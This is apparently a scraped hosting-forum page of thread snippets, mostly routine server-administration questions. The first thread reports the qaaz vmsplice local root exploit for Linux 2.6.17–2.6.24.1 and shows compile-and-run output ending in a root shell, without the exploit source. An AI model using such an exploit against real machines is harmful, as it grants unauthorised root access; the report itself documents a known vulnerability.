Linux vmsplice Local Root Exploit
By qaaz
Linux 2.6.17 - 2.6.24.1

Debian also has a report but I'm trying to avoid linking to the source of the exploit. It works on 2.6.24, but only once. Then the box kernel panics (did for me). 2.6.24.1 is out as of couple days ago, but I'm not sure if it's still vulnerable. Seems like it is.

luki@tester:/tmp$ gcc t.c -o t
luki@tester:/tmp$ ./t
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e6f000 .. 0xb7ea1000
[+] root
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@tester:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@tester:/tmp#

View 15 Replies View Related

Windows- PHP Exploit Being Used To Render All PHP Sites Useless

Mar 23, 2008

This has been happening for about 6 months, someone has been exploiting my windows server and causing 300 php.exe processes to run, therefore making the CPU usage go to 100% and cause all php sites to not function. It is a perl script, and I had gotten ahold of the explot, but am unsure how to block it,

what the following is doing, and how to block it.. once I find the script again I will add it to the post..

I am using Plesk on my box.

View 11 Replies View Related

Lfd: System Exploit Checking Detected A Possible Compromise

Apr 29, 2008

I always recieve this email: from lfd

Time: Tue Apr 29 03:40:13 2008

Possible detection of "Random JS Toolkit"
Failed to create test directory /etc/csf/1: No space left on device:

See [url] for more information

I do this to test if my server is infected:

mkdir /home/1

it created without any problems

and I used tcpdump and I got this:

<script type="text/javascript" src='jscripts/ips_ipsclass.js'></script>
<script type="text/javascript" src='jscripts/ipb_global.js'></script>
<script type="text/javascript" src='cache/lang_cache/en/lang_javascript.js'></script>
<script type="text/javascript" src='jscripts/ips_xmlhttprequest.js'></script>
<script type="text/javascript" src='jscripts/ipb_global_xmlenhanced.js'></script>

is that mean the server is infected? but these scripts are for the IPB forum board so why I still recieve this email?

View 10 Replies View Related

Redirect Http:// To Http://www

Jun 23, 2008

Does anyone know how to redirect the URL of a host so that it always goes to the www subdomain? Is this done with RedirectMatch or is a rewrite rule?

View 3 Replies View Related

Http Messed Up But Not Http

Mar 31, 2008

where when I view my website through http using Firefox, it never stops loading. If I use IE, then I get a "page can not be displayed" error.

If I use https then everything works fine.

I have noticed that if I delete lines from the files, I don't have this problem.

If I try viewing images (so I know it can't be an html of php problem) some look fine (the very small files). But, larger files, around 168 kb, load halfway and the second half is distorted (green and purple chunks and other random colors and lines).

If I view the image through https, the image is perfectly fine!

If I put my site through w3.org's validator (just to see what it would report) it says "500 Line too long (limit is 4096)".

My website used to work, so I know there isn't any code in the pages that would cause this to happen.

Is there an Apache setting I check? Perhaps it is sending a really long header that I can not see? I am not really sure what to do. I have made my site to force https but it's slow and not signed.

View 6 Replies View Related

Http-put Proxy / Http-connect Proxy

Oct 28, 2007

Anyone can inform how to fix "http-put proxy" or "http-connect proxy" ?

My hosting provider said that my dedicated server is not secure because of that.

I use CentOS 4.x and only Apache 2.0.52

# rpm -qa | grep htt
httpd-2.0.52-28.ent.centos4
httpd-suexec-2.0.52-28.ent.centos4

I searched about the topic but got not much information.

View 0 Replies View Related

Csf :: System Exploit* Has Detected A Possible "Random JS Toolkit"

Oct 22, 2009

i update the cpanel and after that lfd fails all the time

ct 22 11:53:21 *** lfd[1653]: *System Exploit* has detected a possible "Random JS Toolkit" - Failed to create test directory /etc/csf/1: Disk quota exceeded

Oct 22 11:53:21 *** lfd[1653]: Error: Cannot open out file: Disk quota exceeded, at line 3780

Oct 22 11:53:21 *** lfd[1653]: daemon stopped

Oct 22 11:53:26 *** lfd[30079]: Error: pid mismatch or missing, at line 589

Oct 22 11:53:26 *** lfd[30079]: daemon stopped

Which can be the issue you think ?

Ip tables in my case all of them they are correct

Even if i restart the virtual its working properly for a while and after that fails

View 9 Replies View Related

Knowledge Of Mysql Exploit Or Mysql Injection?

Jan 17, 2008

Can someone recommended me some one with knowledge of mysql exploit or mysql injection, it seem to our VB forum have issue with database load..

View 5 Replies View Related